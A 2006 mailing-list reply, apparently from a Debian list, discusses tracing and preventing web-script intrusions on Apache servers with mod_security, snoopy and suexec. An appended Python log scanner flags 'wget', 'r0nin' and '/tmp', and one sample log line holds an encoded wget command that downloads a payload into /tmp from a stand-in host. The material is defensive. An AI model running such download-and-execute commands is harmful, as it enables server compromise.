Michael Loftis wrote:
>
>
> --On April 7, 2006 10:57:22 PM +0100 Steve Kemp <skx@debian.org> wrote:
>
>> That is an appalling approach to dealing with the problem, especially
>> if you have an old kernel which could allow privilege escalation.
>>
>> There are several approaches to actually tracking down the source
>> of the problem. The most obvious is to use the mod_security
>> module for Apache to log incoming payloads and ban requests containing
>> strings such as 'wget', 'r0nin', '/tmp', etc.
>>
>> Another approach would be to install 'snoopy', or similar, to log
>> *every* executed script upon a host and then walk backwards from the
>> initial intrusion to the execution of the script.
>
>
> Another one is to use mod_security from modsecurity.org. This helps
> prevent stupid customers from getting your insecure system infected.
> Better still to use suphp or suexec so things don't run as www-data and
> run as their own users.
>

Running apache on a high port and using ProxyPass and ProxyPassReverse
accomplishes the same, correct? I like that solution because then each
user can choose apache1.3 or apache2 and load/unload whatever modules
he/she likes.

-Roberto

--
Roberto C. Sanchez
http://familiasanchez.net/~roberto
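An added example, not part of the original thread: a small after-the-fact scan of Apache access logs for the strings named in the quoted message ('wget', 'r0nin', '/tmp'), useful when tracing an intrusion back to the request that started it. It assumes the common/combined log format and sees only the request line (POST bodies, which mod_security can log, are not in access logs); the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Strings named in the thread as worth flagging in incoming requests.
SUSPICIOUS = ("wget", "r0nin", "/tmp")

# Apache common/combined log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) \S+'
)

def decode_fully(value, max_rounds=3):
    """Undo URL-encoding repeatedly so double-encoded input (%252F) is caught."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (host, time, matched strings, decoded request) for flagged lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        request = decode_fully(m.group("request")).lower()
        matched = [s for s in SUSPICIOUS if s in request]
        if matched:
            hits.append((m.group("host"), m.group("time"), matched, request))
    return hits

# Constructed sample log lines (documentation addresses, made-up paths).
SAMPLE = [
    '192.0.2.10 - - [07/Apr/2006:21:03:11 +0100] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Apr/2006:21:04:52 +0100] '
    '"GET /page.php?x=wget+http%3A%2F%2Fexample.invalid%2Fr0nin+-O+%2Ftmp%2Fr0nin HTTP/1.1" 200 312',
    '203.0.113.5 - - [07/Apr/2006:21:05:30 +0100] "GET /a.php?c=%252Ftmp%252Fx HTTP/1.1" 404 208',
]

if __name__ == "__main__":
    for host, when, matched, request in scan(SAMPLE):
        print(host, when, matched, request)
```

Matching on bare substrings such as '/tmp' will also flag some legitimate requests, so treat the hits as leads to review rather than as a block list.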